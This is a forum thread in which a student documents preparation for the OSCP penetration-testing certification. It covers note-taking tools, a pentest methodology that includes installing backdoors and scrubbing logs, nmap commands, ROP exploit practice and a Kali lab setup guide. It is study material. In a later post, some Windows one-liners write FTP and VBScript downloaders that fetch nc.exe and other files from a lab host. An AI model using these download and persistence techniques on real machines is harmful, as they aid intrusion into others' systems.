OSCP - JollyFrogs' tale

JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
I'll be starting my OSCP journey soon; that is to say: I have already started preparations for the journey but have not signed up to the course yet. I am spending a lot of time sharpening my axe in anticipation of the OSCP tree that yearns to be felled. I have done away with modesty and challenged myself with the goal to subvert 100% of the lab machines and get a 100% marking score on my exam, first try. I am very lucky to have a very understanding second half who fully supports my endeavor. 600 hours of self-study and lab time have been set aside for this great adventure.

My basic plan is as follows:
- Read as many forums and blogs as I can - This task is complete
- Utilize the resources from those forums and blogs to prepare - This is where I am now
- After preparing, I will sign up for the OSCP study and maximize my lab time

I will dedicate 2-3 hours per day plus 8-10 in the weekends to studies. I'll sign up for 3 months lab and should be able to put in more or less 360 hours of lab time if I prepare well. Seeing there are about 60 machines in the lab, that's an average of 6 hours per machine owned. I never expected this to be easy

My preparation tasks are proceeding well. I will detail more about my preparations in days to come.
«1345

Comments

  • MrAgentMrAgent Member Posts: 1,310 ■■■■■■■■□□
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    I got introduced to the OSCP certification during an interview where the interviewer asked me if I had the OSCP credential. After the interview I immediately looked up OSCP on google and found a wealth of information in forums and blog entries about the course. After reading many posts and blogs, I decided that I wanted (read "wanted" and not "needed") to do the OSCP, so I started doing lots of research into OSCP and the materials. I learnt that the primary required attribute of any pentest is the preparation and enumeration phase. I learnt about how hard the labs were, and that some machines like Sufference, Pain and Gh0st were amongst the hardest, toughest nuts to crack. This appealed to me and I set myself a challenge: To hack each and every machine in the labs, and to pass my exam with a 100% score. There are around 60 lab machines and many people struggle in the labs, so this is going to be quite the achievement. I would have to maximize my time in the labs as much as possible if I wanted a chance at hacking (aka "owning" or "pwning") each and every machine that was presented to me.


    After reading many forums, blogs, tweets, and any other information I could get my hands on, I realised that I would have to prepare thoroughly if I wanted to maximise my time in the labs. I've read about some people taking 4 weeks just to get through the course materials, then another 4 weeks to get everything in order before they can access the labs. I was not going to let that happen to me, I wanted to start tackling the labs from the get go. I asked my partner if she was ok with me disappearing into virtual labs every night and every weekend for the next 3 months, she is very supportive.


    One of the most important aspects of my preparations would be to decide what note-keeping software I was going to use. OSCP recommends a program called "KeepNote", but me being me, I decided to make up my own mind. So I spent two full days trying various notekeeping softwares. I tried CherryTree, KeepNote, EverNote, OneNote, NoteCase, Zim, KeyNote, and many more. I had certain requirements for what a good note-keeping tool would have to do if I wanted to maximise my time in the labs:
    - Hierarchical (tree with sub branches and "leaves" aka pages)
    - Easy screen Clipping feature (press a shortcut and the program inserts a screenshot for you in your notes)
    - NOT in the cloud (I prefer not to put personally identifiable items in the cloud)
    - Export into .PDF or .DOC format so I didn't have to rewrite my report after taking the notes


    CherryTree, KeepNote and OneNote were my preferred tools. I really liked OneNote with one exception: The free version of OneNote forces you to save everything into the cloud, unencrypted. CherryTree looked good, plenty of addons and plugins and it could do what I wanted although simple things like setting up screen clipping were very clumsy. I eventually settled on KeepNote, due to its simple layout and integrated screenshot functionality. The only downside of KeepNote is that it can't save its output in .PDF format. But when I thought about that requirement a bit more, it didn't make sense to just compile my notes in a .PDF and send that off to the OffSec guys: Plenty of items in my notebook would be for personal use only or not relevant to the exam. Many screenshots I might not need or want in the report so I would probably have to compile a separate report anyway, which I have decided to do in Word, using the information and screenshots in KeepNote.


    I've started using KeepNote now and I'm very satisfied with the decision to use KeepNote, having tried many other tools. I'm writing this note in KeepNote!


    Tips on using KeepNote:
    - Take a screenshot by pressing CTRL-INSERT.
    - Run KeepNote off an SSD hard drive otherwise it can be sluggish.
    - If possible, don't attach files into KeepNote or it might corrupt your notes. Try to keep sploits/files in a separate directory on your PC.
    - Spend a few hours setting up your folder structure.
    - Make frequent backups. I backup my KeepNote notebook every 3-4 hours.
  • veritas_libertasveritas_libertas Member Posts: 5,746 ■■■■■■■■■■
    Sounds like fun. I'm hoping to get to the OSCP eventually. Right now I'm slowly working through eJPT and then eCPPT. If you want to be "elite" you could use VIM for note keeping ;)

    Good luck with the OSCP!
  • justjenjustjen Member Posts: 77 ■■□□□□□□□□
    Thank you for sharing your thoughts on tools for note-keeping. I am working on enhancing my skill set and doing some advance prep work, before beginning my OSCP journey. My plan for this summer is to learn python, develop a greater comfort level with Kali Linux, and do some self-study to refresh my basic pentesting knowledge, before registering for PWK in the fall.

    One of the things I had on my checklist was to find a tool that would work well for organizing and managing extensive sets of notes. Your comments will be very useful when I am choosing a tool for notes. :)

    Thanks again!
    ~justjen
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    Another week has passed, and I'm having a blast with the OSCP preparations so far. I haven't even registered for the course yet, as I am still sharpening my axe. I've started thinking about a calculated approach for pen-testing. I felt the generic approach was a bit vague, so I have come up with a much more detailed approach. I intend to script as many of the steps as possible, I've started scripting 1) and 3)


    The system I came up with (which I will probably tune once I get started in the labs) is as follows:


    1) Recon scripts: Automated recon of a network. This will give us a generic idea of what kind of machines are on the network and the various OS's and possible "sweet spots" to start the exploitation process. Only the top 10-20 ports are scanned but we're scanning the whole /24 range.

    2) Mapping scripts: Mapping is where I aggregate the data gathered from the recon scripts and start to make sense of things. This includes relationships between systems and traffic flows. This is a manual step which will be done in Visio manually. I have built a Visio template diagram which I will use for this purpose. Mapping will be a continuous process as I move forward in the lab and the Visio diagram will be updated on an almost daily basis.

    3) Remote enumeration scripts: These are scripts which will scan a single system remotely, mostly enumerating ports and shares but also the information FROM those ports. This is where the full 1-65535 ports will be scanned (both TCP and UDP) and where each port is fingerprinted, SMB shares are enumerated, user IDs, SNMP details, FTP banners, OS versions etc

    4) Remote Exploits & Privilege Escalation: Here we move from knocking on the door to bashing the door out of its sockets and force entry in to the remote system. This includes remote "point-and-shoot-instant-system-access", FTP brute-force, HTTP directory brute force, SNMP brute force, active exploits against open services, etc

    5) Local Enumeration scripts: Once we have entered the machine remotely, we enumerate again, getting as much information from the system as possible. This includes interesting files, bash history, cmd history, environment settings, memory, running services, directory permissions, service permissions, scheduled jobs, weak permissions etc

    6) Local Exploits & Privilege escalation: We might have a low level user, or a restricted administrator account, this is where we escalate to full root/system level access. This includes UAC bypass, elevation scripts, local exploits, brute forcing, etc

    7) Persistance: This is where we install backdoors to secure our access. We don't want to have to go through the whole steps above again. Things like adding local administrator accounts, setting service to start automatic on boot, putting a pinhole in the firewall service, etc

    icon_cool.gif Root Loot scripts: This is where we search the whole system with system/root access for interesting data. This includes stealing hashes from LSA, configuration scripts, SAM/shadow database, cracking MD5 and NTLM, checking currently connected users, checking relationship between this host and other hosts, etc

    9) Cleanup: This is where we scrub logfiles, clean exploits, hide backdoors, essentially we "wipe our fingerprints" from the system

    10) Update maps and diagrams, and move to another system on point 3)
  • wd40wd40 Member Posts: 1,017 ■■■■□□□□□□
    Great detailed post, Thanks.

    Please continue posting, I am sure people will be following your posts.

    I wish I had the willpower to do this ..
  • MrAgentMrAgent Member Posts: 1,310 ■■■■■■■■□□
    Just a word of advice. If you're going to script out scanning, make sure you have something in place to scan even if ICMP is not enabled on the target.
  • MitechniqMitechniq Member Posts: 286 ■■■■□□□□□□
    I believe I am missing something here, why are you going through the effort of building out your own scripts when Kali has all the modules and tools to Pen-Test. Since you will be using Kali for the labs and the exams, wouldn't it just be better to download Kali and familiarize yourself with it.
  • MrAgentMrAgent Member Posts: 1,310 ■■■■■■■■□□
    A part of the course is bash scripting. I did the same thing during my lab time. Scripting out a scan will allow you to automate a lot of of stuff, its very useful.
  • NovaHaxNovaHax Member Posts: 502 ■■■■□□□□□□
    Mitechniq wrote: »
    I believe I am missing something here, why are you going through the effort of building out your own scripts when Kali has all the modules and tools to Pen-Test. Since you will be using Kali for the labs and the exams, wouldn't it just be better to download Kali and familiarize yourself with it.

    You are exactly right. There is absolutely no reason to automate discovery during the PWK course. Just use Nmap.

    For a lot of people though, OSCP is one of their first encounters with scripting and automation. The course demonstrates basic automation within the context of scanning and people often tend to get the idea that they need to do this, when in fact, the course is really just trying to demonstrate automation fundamentals.

    I've literally seen people get so wrapped up in this part of the course that they completely forget the objective is to start popping boxes.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    Mitechniq wrote: »
    I believe I am missing something here, why are you going through the effort of building out your own scripts when Kali has all the modules and tools to Pen-Test. Since you will be using Kali for the labs and the exams, wouldn't it just be better to download Kali and familiarize yourself with it.

    I don't believe that using a powerful tool such as Metasploit will teach the level of fundamentals that I am seeking.

    I learned about fuzzing, assembly language, endian systems, memory and debuggers. The easy path would have been to use a readily available fuzzing tool, or a proof of concept code and modify the shell code to open a shell to a slightly different IP address.

    I chose the hard way and wrote a Python script (I had never seen a Python script until 2 weeks ago) to fuzz the application, based on another exploit I had written for a more basic application. The result of coding the fuzzer myself is that I know what each and every line of code does and why it is there. In the process of exploiting VulnServer.exe I created a generic process for writing exploits.

    I seek not just to admire the magic, but to understand and master it.
    MrAgent wrote: »
    Just a word of advice. If you're going to script out scanning, make sure you have something in place to scan even if ICMP is not enabled on the target.

    Agreed, I was anticipating firewalls blocking ICMP. These are the commands I decided on using:

    1) Start with a recon scan of the network to get an idea of the network:
    nmap -Pn -F -sSU -T5 -oX /root/10.1.1.1-254.xml 10.1.1.1-254 | grep -v 'filtered|closed' > /root/quick_recon.txt

    2) Then force-scan all ports UDP + TCP per host (takes about 4 minutes per host on a LAN or roughly 17 hours for 254 hosts):
    nmap -Pn -sSU -T4 -p1-65535 -oX /root/10.1.1.110.xml 10.1.1.110 | grep -v 'filtered|closed'

    3) Then run an intensive scan on the open ports per host, TCP and UDP separately to speed scan up:
    tcp: nmap -nvv -Pn -sSV -T1 -p$(cat 10.1.1.110.xml | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/10.1.1.110-intense-tcp.xml 10.1.1.110
    udp: nmap -nvv -Pn -sUV -T1 -p$(cat 10.1.1.110.xml | grep portid | grep protocol=\"udp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/10.1.1.110-intense-udp.xml 10.1.1.110

    Note: During the lab time, I intend to reset the host before doing a full port scan. I will reset each host before I attack it to ensure that there are no spoilers or backdoors on the host.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    I learnt about ROP chains yesterday. Very interesting stuff. How did I get into ROP chains, and what are they? Ohhh good question, let's go back in time! Keep in mind, I haven't yet started the course, this is all part of my preparations to maximize lab time

    In the OSCP Syllabus (available here: https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf) a "Crossfire" application is mentioned. I went to exploit-db.com and saw that crossfire 1.9.0 is vulnerable to a buffer overflow (https://www.exploit-db.com/exploits/1582/). The code is in c and is overly complex for my needs (dynamic shellcodes etc). The code abuses an overflow in the "setup sound" module and I had to fuzz the application with various codes until I found the exploit code I needed and the server crashed. I am running the Crossfire application on my Kali machine and use the evans debugger which comes as part of the Kali distribution. After crashing the server, finding the bad characters and being able to overwrite the EIP, I sent my reverse shell in anticipation of a prompt... and nothing happened!

    In EDB I saw a segmentation fault. This was new. I put a breakpoint on the JMP ESP trampoline I had set up to jump to my shell code, and reran the sploit. EDB breaked out at my JMP ESP trampoline, I pressed F8 to step one instruction further and surely I was in my jump code which was about to jump to my shell code. When I pressed F8 on the first instruction in my jump code I got a segmentation fault. This was new and unexpected! Why would the program segment fault on a perfectly good instruction? I started googling "Linux memory segmentation fault" which gave too many results, I then searched "linux segmentation fault exploit" and found c - Exploiting buffer overflow leads to segfault - Information Security Stack Exchange which hints toward a feature called ASLR and "-z execstack". Further research indicates that these are two memory protection mechanisms: ASLR randomizes the memory address space and the -z execstack relates to a feature called execshield (aka "NX bit", aka "DX", aka Execute Disable, aka DEP, aka many other names). I checked on my Kali machine whether this might be the culprit with the following command "dmesg | grep --color '[NX|DX]*protection'" and indeed, NX was enabled. Further investigation into the possibility to disable NX bit (including via my virtualbox option "Enable PAE/NX" would just result in Kali emulating NX and not really solve my problem in the first place: If this was a remote host, would I be able to disable NX via its host system or via kernel options? The answer is most likely no, unless I had some kind of root/system/god-mode access to the network in which case the exercise would not be required.

    DEP/NX works very simply: If memory is R/W, then it can't be X. If memory is R/X, then it can't be W. So if we can WRITE to the memory (stack) then we can't EXECUTE it. (hence the segmentation fault). It we can EXECUTE it, we can't WRITE to it.

    So I started looking into the option to exploit this "NX bit" and whether I could program around it: Enter ROP! ROP stands for Return Oriented Programming. Where normal programs use the EIP address to point to the next instruction, ROP uses the ESP address to point to the next instruction. How can this be? Well, it turns out that any "RET" instruction in programs look up the original source address which they get from the ESP, not the EIP. So while normally we'd try to control the flow of a program with EIP, with ROP we try and control the flow of the program with ESP. Let me explain:

    Normal execution: MOV EAX,1 -> EIP increased by one which points to the next instruction -> MOV EBX,1 -> EIP increased by one which points to the next instruction etc
    ROP execution: ESP points to RET -> return address taken from ESP stack -> ESP points to another RET -> EIP never gets a chance to play

    So what good is it to execute RET instructions the whole time? Well not much. But here comes the genius: If we can find OTHER instructions just before the RET instructions, we can have the system execute those instructions, the RET will be next which we control because we control the ESP stack. We can't WRITE the instructions we're using, but we can EXECUTE them (and as such, DEP allows us to execute).

    And that's where I am now, do I install a vulnerable operating system without NX support and simply follow the exercises, or do I write a ROP exploit for Crossfire 1.9.0? The ROP exploit is tempting but will be time-consuming, it could take me a week to finish a ROP exploit, which I could spend on finishing my preparations. I'll keep you posted!
  • wes allenwes allen Member Posts: 540 ■■■■■□□□□□
    You should read up on EMET, and how to bypass it, if you are interested learning more about modern memory protections.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    wes allen wrote: »
    You should read up on EMET, and how to bypass it, if you are interested learning more about modern memory protections.

    Hi Wes,

    Thanks. The current exploit I'm writing runs on Linux and EMET seems to use similar techniques to the Linux memory protections. I've decided to go the hard way and write a ROP exploit for Crossfire 1.9.0 running on Kali 1.1.0a. I will read up on EMET after I get success - which could take considerable effort and time.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    Ok, so after spending two full days programming ROP chains, I finally created a working ROP chain which works on the Kali PAE image. I now realize that I have been working with the wrong image from the very start.

    So here is a tip:
    When downloading the Kali image from the offensive security site (https://www.offensive-security.com/kali-linux-vmware-arm-image-download/) make sure you choose the image called "Kali 32 bit VM" and not the image called "Kali 32 bit PAE VM" like I did haha, I learnt today that sometimes, more is not better :)

    I did learn a lot by using the PAE image:
    - Built a working ROP chain
    - Use gbd and edb debuggers more proficiently
    - Write scripts more efficiently
    - Found lots of interesting websites in the process
    - Got better at python scripting
    - Learnt some really cool assembly tricks
    - Learnt to decompile shellcode to assembly code to analyze what it does
    - Learnt to write my own shellcode in assembly, compile it and run it!
    - including my own first assembly reverse shell

    But, I must keep on track, it's time to move on to web application vulnerabilities and SQL injection, woop woop!
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    JollyFrogs, Brisbane Australia
    Version: 0.1
    Revision date: 26 May 2015


    Welcome message
    This is my OSCP build guide, the goal of this guide is to help set up a Linux Kali machine on VirtualBox for OSCP studying.
    Note: This guide is written for Windows 7 64-bit Host OS, I strongly advise using this operating system to install your OSCP machines.


    This is the hardware that I used to set up this lab, if you don't have similar or better hardware, I advise investing a little in getting good hardware:
    Asus Maximus Hero VI motherboard
    32GB memory (Kingston)
    Intel 120GB SSD
    Core i7-4770K CPU @ 3.50GHz, 4 Core(s), 8 Logical Processors
    Windows 7 64-bit (6.1.7601 SP1)


    I have created this lab using my own network IP addressing, details of which are:
    (All subnet masks in the LAN are /24 aka 255.255.255.0)


    The following components are what I start with, just my PC and a router which I used as default gateway to connect to the internet:
    10.1.1.1 = My physical internet router (a Ubiquity ERLite3) which acts as my default gateway and DNS server.
    10.1.1.200 = My main PC LAN interface, we will lose this IP when we configure a BRIDGE interface later


    The following IP addresses are used for various components that are added during this guide:
    10.1.1.200 = My main PC BRIDGE interface
    10.1.1.199 = Kali 1.1.0a VirtualBox VM


    You have two options when following this guide:
    1) Rename all references to the IP addresses above and in this guide to IP addresses you are using on your LAN.
    or
    2) Renumber your internal network IP addressing to use the same IP addresses as in this guide.


    You do not need hardware components to set up this lab other than a beefy PC, everything is virtualized in your PC.


    Preparations


    Note: The fun part begins in the section called "After Reboot", but don't skim over these first steps; they are the foundation of your environment. Any mistake here will affect your environment later in unpredictable ways, please take the time to go through these steps carefully. Spelling matters, typos matter. If you run into any issues during installation, please re-read the instructions carefully and ensure you haven't made a typo.


    IMPORTANT NOTE: I don't isolate hosts on my network. This is a very *UNSAFE* practice, especially when meddling with vulnerable applications and systems while coding and testing new exploits. I run a simple but good firewall (Ubiquity ERLite3) which protects my network from outside attacks, but more importantly, I have off-line backups of all my important files and documents. If this is something that you don't feel 100% comfortable with, then you should set up an isolated network which is totally segregated from your home network. VirtualBox supports this kind of set up via "Host-only adapters".


    Get required files:
    VirtualBox 4.3.26 R98988:
    http://dlc-cdn.sun.com/virtualbox/4.3.26/VirtualBox-4.3.26-98988-Win.exe


    Kali 1.1.0a (kali-linux-1.1.0a-i486.iso):
    http://images.offensive-security.com/kali-linux-1.1.0a-vm-486.7z
    NOTE: For the OSCP exam, you'll need the 32-bit Kali, NOT the 64-bit as people have reported issues with 64-bit.
    NOTE: Don't get the "PAE" version of Kali linux! We'll be running buffer overflows on your Kali and PAE will make the exercise needlessly hard


    Create and bridge a loop-back adapter so your virtual machines can talk to your physical PC and network
    - Click the Windows Start button (bottom left)
    - type "cmd" but do not press enter
    - Right-click "cmd.exe" (top of start bar menu) and select "run as Administrator" (Click "Yes" to confirm)
    Note: In the black cmd.exe screen:
    - type "hdwwiz.exe" and press Enter
    Note: the "Add Hardware Wizard" window opens
    - Click "Next"
    - Select “Install the hardware that I manually select from a list (Advanced)” and click "Next"
    - Select “Network adapters” and click "Next"
    - Select “Microsoft” and “Microsoft Loopback Adapter” under Manufacturer and Network Adapter respectively, then click "Next"
    - Click "Next" to install the loopback adapter
    - Click "Finish" to close the "Add Hardware" screen
    Note: We're still in the black cmd.exe screen:
    - type "ncpa.cpl" and press Enter
    Note: the "Network Connections" window opens
    - Right-click the adapter "Microsoft Loopback Adapter" and select "Rename"
    - Rename the Loopback Adapter to "LOOPBACK" to remove confusion later
    - Right-click your wired network adapter and select "Rename"
    - Rename your wired network adapter to "LAN"
    - Highlight (left click while holding CTRL key pressed) both the LOOPBACK adapter and your LAN network adapter
    - Right click on the LOOPBACK while both adapters are highlighted and select "Bridge Connections"
    Note: This will create a new network card called "Network Bridge"
    - Right-click your new bridge adapter and select "Rename"
    - Rename your wired network adapter to "BRIDGE"
    - Right-click "BRIDGE" and select "Properties"
    In the "BRIDGE Properties" screen:
    - Left-click (this highlights) "Internet Protocol Version 4 (TCP/IPv4)" and click "Properties"
    In the "Internet Protocol Version 4 (TCP/IPv4) Properties" screen:
    In the "General" tab at the top:
    Select "Use the following IP address"
    IP address: 10.1.1.200
    Subnet mask: 255.255.255.0
    Default gateway: 10.1.1.1
    Preferred DNS server: 10.1.1.1
    Alternate DNS server: <leave blank>
    - Click "OK" to close the "Internet Protocol Version 4 (TCP/IPv4) Properties" screen
    - Click "Close" to close the "BRIDGE Properties" screen
    Note: We're still in the black cmd.exe screen:
    - type "ping www.google.com"
    Note: You should see replies from the google web server. Your BRIDGE adapter is now your main network adapter
    Note: Do not proceed if you do not have internet connectivity
    - Close the "Command Prompt" black cmd.exe screen


    Install VirtualBox
    Run "C:\GNS3\INSTALLERS\VirtualBox-4.3.26-98988-Win.exe"
    Note: Click "Yes" on any opening warnings
    - Click "Next"
    - Click "Next" (install all options)
    - Click "Next"
    - Click "Yes"
    - Click "Install" to start the installation
    - Click "Yes" at the UAC warning screen
    - Click "Install" to install the device driver
    - Click "Finish"


    Install Kali 1.1.0a on VirtualBox 4.3.26 R98988
    Unzip the file kali-linux-1.1.0a-vm-486.7z to E:\VIRTUALBOX_DISKS\kali\


    Start "Oracle VM VirtualBox"
    - Click "New"
    Name: Kali110a-32bit-NOPAE
    Type: Linux
    Version: Debian (32 bit)
    - Click "Next"
    MB: 1024
    - Click "Next"
    Select "Use an existing virtual hard drive file"
    - Click the little yellow folder with the green arrow
    Choose: "E:\VIRTUALBOX_DISKS\kali\Kali-Linux-1.1.0-vm-486.vmdk"
    - Click "Create"
    NOTE: A new icon "Kali110a-32bit-NOPAE" was created in your "Oracle VM VirtualBox Manager"


    NOTE: Leave settings at default unless otherwise stated below
    NOTE: I'm showing some important settings even though they are defaults, in case the defaults change some day
    - Right-click "Kali110a-32bit-NOPAE" in the left menu and click "Settings..."
    General - Advanced - Shared Clipboard: "Bidirectional"
    System - Motherboard - Floppy: Untick
    System - Processor - Enable PAE/NX: Make sure this is NOT ticked
    Audio - Enable Audio: Untick
    Network - Adapter 1 - Enable Network Adapter: Tick
    Network - Adapter 1 - Attached to: "Bridged Adapter"
    Network - Adapter 1 - Name: "MAC Bridge Miniport"
    Network - Adapter 1 - Advanced - Adapter Type: "Intel PRO/1000 MT Desktop (82540EM)"
    Network - Adapter 1 - Advanced - Promiscuous Mode: Allow All
    Network - Adapter 1 - Advanced - MAC Address: 444444444444
    NOTE: Set the MAC address to an easily identifiable MAC
    Network - Adapter 1 - Advanced - Cable Connected: Tick
    - Click "OK" to close the "Kali110a-32bit-NOPAE - Settings" screen
    - Right-click "Kali110a-32bit-NOPAE" in the left menu and click "Start"


    Note: A new screen "Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox" opens and the Kali Linux installer will boot.


    In the "Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox" screen:
    Your new Kali installation will boot, let it time out for 5s in the GRUB menu
    You will be presented with the Kali login screen
    Click anywhere in the screen with your mouse
    Note: To unlock the mouse from Virtualbox, press the rightmost CTRL key on your keyboard
    - Click on "Other..."
    - Username: root <enter>
    - Password: toor <enter>
    Note: You will be presented a desktop environment.
    Note: Do *NOT* update Kali linux, we'll make a backup first so you can go back to a clean Kali installation


    In the top of the screen, click the black >_ icon ("terminal")
    In the "root@Kali110a:~" terminal window type (omit "root@kali:~# "):
    root@kali:~# ifconfig
    Note: You should see eth0 has an IP address
    root@kali:~# ping 8.8.8.8
    Note: You should see replies from 8.8.8.8
    - Close the "root@kali:~" terminal window
    Press the right-most CTRL key on your keyboard to unlock the mouse
    In the top menu bar of the "Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox" screen:
    - Click "Devices" -> "Insert Guest Additions CD Image..."
    - Click "Cancel" in your Kali desktop popup to dismiss the autorun popup
    In the top of the screen, click the black >_ icon ("terminal")
    In the "root@kali:~" terminal window type (omit "root@kali:~# "):
    root@kali:~# cp /media/cdrom/VBoxLinuxAdditions.run .
    root@kali:~# ./VBoxLinuxAdditions.run
    Note: VirtualBox Linux Guest additions will now install
    root@kali:~# reboot
    Note: After rebooting you will notice that your mouse magically enters and exits the VM. This is because of the VirtualBox Additions!
    - Press <Enter> on "Other..."
    Username: root <enter>
    Password: kali <enter>
    - Right-click "VBOXADDITIONS_4.3.18_96516" and click "Eject" near the bottom
    Note: Now that you have installed the VirtualBox additions to Kali, you can:
    - Seamlessly move the mouse in and out of the virtual machine
    - Copy/Paste to and from the virtual machine using clipboard
    - Share folders between the virtual machine guest and your host machine
    In the top of the screen, click the black >_ icon ("terminal")
    In the "root@kali:~" terminal window type (omit "root@kali:~# "):
    root@kali:~# shutdown -h now
    Note: Now that we have a good clean install of Linux Kali, we'll back it up so you can restore a clean install in minutes if required


    In the "Oracle VM VirtualBox Manager" window:
    - Click "File" -> "Export Appliance..."
    - Left-click "Kali110a-32bit-NOPAE" to highlight it
    - Click "Next >"
    File: "D:\STUDY\OSCP\VIRTUAL_MACHINES\VANILLA_BACKUPS\Kali110a-32bit-NOPAE.ova"
    Format: "OVF 1.0"
    Write Manifest file: Tick
    - Click "Next >"
    - Click "Export"
    Note: The export can take quite a while
    Note: After the export finishes, we have completed the installation of Kali in your network!
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    I've focused on the Windows platform in recent days. I managed to grab my notebook and took notes while falling down the rabbit hole. I've counted 493 pages in my notebook so far, of which about half is scripts and text.


    Over the last few days I've learnt/done:
    - Default Windows UAC settings are easy to bypass as long as the setting is not set to "Always prompt me when programs try to run with elevated privileges". By default, Windows 7 has this setting disabled. I've coded several pieces of code that allow me to run my own programs without being prompted by UAC. I'm not sure if I will need this functionality in the labs, but if I do, it will save me some research and compilation.
    - A properly built and secured Windows machine is not trivial to exploit.
    - I've been building a list of "interesting files" as part of my ever growing "loot list". I'll be enumerating 3 times per host: The first time is during remote enumeration, the second time I will enumerate as a low privilege user, the third time I will enumerate as the system/root account. Literally "Enumerate, Enumerate and Enumerate some more". The enumeration scripts for the local user and root user are very similar: After all, I don't know which files I will have access to under either account so I have to run all checks in my loot list, without prejudice. Would I expect a admin to give world readable permissions to the shadow file? No, but someone else might! For instance, a badly configured machine might allow access to the SAM database as a low privileged user, so any loot that would be interesting to run under the root account would be equally (if not more) interesting under the low privilege account. Similarly, some files might be hidden to my low privilege user which will only be reachable under the system/root account.
    - I worked on my windows one-liner command skills, learnt a lot
    - I created a tool-set for downloading files to windows machines using various techniques for different platforms, using only default tools available on the target host. I would imagine that on most windows machines, tools like nc.exe won't be available so this will provide me with an easy way to transfer the files without requiring additional tools on the windows machine.
    - I've learnt that a Philips HD9240 Airfryer makes delicious, crispy fries! (I bought one last week)


    Over the last few weeks I've come to understand the importance of having a solid documenting methodology. I understand now just how easy it is to get lost in all the information out there. Spending a few days early on, perfecting my documentation system has been critical in keeping my gathered information categorized. I'm using the same major folder structure a per my post #6, and with almost 500 pages of documentation it's still easy to find information.


    I still have much to do before I can consider myself ready on the windows platform: Pre-compiling exploits, scripting, privilege escalation to name a few big ones. And that's just the Windows side of things, after Windows there is Linux, databases, web-servers etc... I am starting to understand how people can get bogged down in their progress.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    It's Saturday and another week has flown by. I've had to burn the midnight oil at work and I haven't been able to put in as much study time as I wanted. I did study every day though, just not the 3 hours I initially planned. I've modified my attack vector slightly, including public research in the passive recon step, and creating a new step for social engineering and client-side attacks. I still like the idea of having sub-folders with the various platforms so I've left that bit untouched. I started attaching my compiled exploits into my notebook, organized by platform. I haven't had a crash yet but I ensure I keep saving the notebook every 5-10 minutes, with a full notebook backup every 2-3 hours and at the end of each day. I decided to zip the exploits before attaching them, which allows me to double-click on an entry in my KeepNote notebook which will open the contents of the zip file (the exploit) in my 7-zip explorer-like window. I wasn't keen on double-clicking on executable exploits in KeepNote on my day-to-day desktop machine, even though I know they won't harm my machine since I coded them. I only pre-compiled exploits with bind shells privilege escalation exploits, and I ensured that all my exploits have easily swappable shell-codes. I have kept the sources of my exploits with detailed guides on how to compile on Kali for when I need reverse shells. I have come up with a naming convention which allows me to quickly search through the ever growing list of exploits and source codes I'm hoarding. Every script and piece of code starts with a note on how to compile, how to use and how to modify.

    Here are some of my Windows one-liners, these two methods can be used for any command that requires multiple lines, for instance when creating an FTP script or creating a visual basic script to download a file:

    set r=^&echo:&&(echo open 10.1.1.110 21%r%ftp%r%bin%r%GET nc.exe%r%bye) > ftp.txt&&ftp -s:ftp.txt
    or
    (for %t in ("open 10.1.1.110 21" ftp bin "GET nc.exe" bye) do @echo %~t) >ftp.txt&&ftp -s:ftp.txt

    Keep in mind that the Windows nc.exe tool has a limitation on the amount of data you can send per command. For instance, nc.exe will crash with the following one-liner because it is too long (it works in cmd.exe and other cli's, just not via nc.exe):

    (for %t in ("strUrl = WScript.Arguments.Item(0)" "StrFile = WScript.Arguments.Item(1)" "Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0" "Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0" "Const HTTPREQUEST_PROXYSETTING_DIRECT = 1" "Const HTTPREQUEST_PROXYSETTING_PROXY = 2" "Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts" "Err.Clear" "Set http = Nothing" "Set http = CreateObject("WinHttp.WinHttpRequest.5.1")" "If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")" "If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")" "If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")" "http.Open "GET",strURL,False" "http.Send" "varByteArray = http.ResponseBody" "Set http = Nothing" "Set fs = CreateObject("Scripting.FileSystemObject")" "Set ts = fs.CreateTextFile(StrFile,True)" "strData = """ "strBuffer = """ "For lngCounter = 0 to UBound(varByteArray)" "ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1)))" "Next" "ts.Close") do @echo %~t) >wget.vbs && cscript wget.vbs http://10.1.1.110/putty.exe putty.exe
  • MrAgentMrAgent Member Posts: 1,310 ■■■■■■■■□□
    Nice write up so far. I'm sure you'll be able to pass the exam on the first pass.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    I signed up today! I enlisted with my work email, got an email on my work email with confirmation code, which I used to sign up. My account is being generated after which I will have to test out lab access. When this is confirmed, I will get the option to pay for the 90 days of labs and the exam. I'm really looking forward to starting the lab and I'm keen to see if my preparations will pay off. My goal is 100% of the lab machines owned.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    I have completed my sign up for the Penetration Testing with Kali (the required course to sit the OSCP exam).
    The process is as follows:
    - Sign up via offensive-security.com website with a non-public email address
    - Get an email from them shortly after with a registration link
    - Use the link in the email to reserve a starting date for the labs
    - Receive an email shortly after (within a day or so) with VPN details to test the VPN connection for up to 48hrs and a payment link
    - After verifying the VPN connection works, pay for the course using the payment link (within 72 hours)
    - Wait until the starting day

